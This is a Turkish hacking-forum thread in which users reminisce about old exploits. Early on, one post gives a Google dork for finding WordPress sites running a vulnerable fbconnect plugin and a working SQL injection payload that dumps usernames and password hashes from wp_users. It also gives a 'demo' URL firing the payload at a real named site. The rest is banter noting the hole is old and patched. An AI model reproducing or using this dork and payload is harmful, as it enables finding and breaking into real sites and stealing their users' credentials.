Yardım @King 2016 FB :')

Yıllar önce kalmadan açıklarla exploit vay vaay vaay zaman pis akmış kıymetli dostum

inurl:"fbconnect_action=myhome"

bu dork

bu da exploit
/path/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--


Demosuda buydu;

http://reddkaltim.or.id/path/?fbconnect_action=myhome&fbuserid=1%20and%201%3D2%20union%20select%201%2C2%2C3%2C4%2C5%2Cconcat(user_login%2C0x3a%2Cuser_pass)nooDie%2C7%2C8%2C9%2C10%2C11%2C12%20from%20wp_users--&fbclid=IwAR3EuJh2vZbmm41H-YnfwffHVJMWFUcJ5VIeGbAYwlkkk3aM_BFhJ4PBPwA

 

wordpress üzerinden facebookun giriş açığı login olması lazım
@King :')

 

https://www.facebook.com/externalhit_uatext.php sunu atıp seni heçklicem lEn mqQ diyen veletlerle doluydu bi ara formlarda

 

wordpress üzerinden facebookun giriş açığı login olması lazım
@King :')

sanırsam 2017'de facebook gr'de vardı bu açık.
edit: inceledim o açık değilmiş ben bunu ilk defa görüyorum ancak güzel bir mantığı var açığın

 

sanırsam 2017'de facebook gr'de vardı bu açık.
edit: inceledim o açık değilmiş ben bunu ilk defa görüyorum ancak güzel bir mantığı var açığın

admin panel deki açıktı ama uzun süre geçtiği için düzeltmişler ve o domain uzantısını da değiştirmişler sanırım

 

admin panel deki açıktı ama uzun süre geçtiği için düzeltmişler ve o domain uzantısını da değiştirmişler sanırım

eski zafiyetmiş güncellemişler demke kanks.

 

eski zafiyetmiş güncellemişler demke kanks.

sende olmasan eskilerden 3 kelam edeceğim arkadaşım yok sağ olasın isotcu gardasım benim 🥰😍

 

sende olmasan eskilerden 3 kelam edeceğim arkadaşım yok sağ olasın isotcu gardasım benim 🥰😍

teşekkür ederim brom aynısı senin içinde geçerli <3